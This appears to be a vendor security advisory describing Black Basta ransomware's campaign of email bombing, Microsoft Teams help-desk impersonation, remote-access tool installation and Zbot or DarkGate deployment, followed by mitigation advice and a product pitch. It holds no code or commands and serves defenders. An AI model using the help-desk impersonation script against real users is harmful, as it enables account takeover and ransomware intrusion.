Starting in October of 2024, cyber security researchers have observed the Black Basta ransomware group’s deployment of new payloads – Zbot and DarkGate malware – via increasingly sophisticated social engineering mechanisms.
Black Basta has shifted from a primarily botnet-reliant threat distribution approach to a hybrid model that weaponizes social engineering. The attackers' new strategy bypasses traditional security measures. Attack stages include:
1. Email bombing. During this stage, users within the target environment will receive an overwhelming number of emails simultaneously; often achieved by registering targets’ email addresses across a large variety of lists.
2. Impersonation. After the “email bombing”, the cyber criminals connect with users on Microsoft Teams, pretending to be IT support and/or impersonating a given organization’s IT support staff members.
The account domains actively in use include both Azure/Entra tenant subdomains. For example, username[@]tenantsubdomain[.]onmicrosoft[.]com or username[@]helpstaff[.]com.
Operator chat display names include Help Desk, Help Desk Manager, Technical Support and Administracion.
3. Social engineering. Unsuspecting individuals who interact with the “IT support” are told to install legitimate remote access software; AnyDesk, ScreenConnect, TeamViewer and Microsoft’s Quick Assist.
Threat intelligence also shows that the threat actors are exploiting the Windows OpenSSH utility to establish backdoor network access via reverse shell mechanisms.
Using the manipulative tactics outlined above, Black Basta can easily gain a foothold in an ecosystem.
Around this point in the attack cycle, cyber criminals deploy the Zbot or DarkGate malware. The latter enable credential harvesting, potential VPN configuration file theft, keystroke logging and possible multi-factor authentication bypasses.
| This Black Basta ransomware disclosure arrives on the heels of Check Point’s detailed analysis of an updated Rust variant of the Akira ransomware, which now uses a new and complicated assembly mode to reach users. |
Strategic Recommendations for Threat Mitigation
1. Limit external messaging through Microsoft Teams. By default, Teams will allow external requests. Consider blocking all external domains and creating a white/black list
2. Offer user awareness training. Educate users regarding help desk/IT support procedures. Enable users to identify suspicious requests. In addition, teach users about how to report these types of situations.
3. Multi-dimensional authentication protocols. Establish a framework that implements adaptive multi-factor authentication mechanisms, uses contextual and behavioral analysis for access validation, and that enforces strict protocols governing access tool installations.
4. Network architecture and access management. Design a robust network security infrastructure that applies the principle of least privilege across user access levels, implements granular network segmentation to contain potential breach impact, and leverages endpoint protection systems to intercept unauthorized access attempts.
5. Advanced collaboration security implementation. Deploy cutting-edge email and collaboration security solutions that leverage AI and machine learning to detect and neutralize sophisticated social engineering attempts.
Solutions like Check Point’s Harmony Email & Collaboration provide intelligent threat detection capabilities that can analyze patterns and identify risks – with unprecedented levels of accuracy.
Vigilance combined with the use of top technologies isn’t simply a recommendation – it’s a strategic business imperative.
For more information about email and collaboration tool security click here. Or get a Harmony Email & Collaboration solution demo today.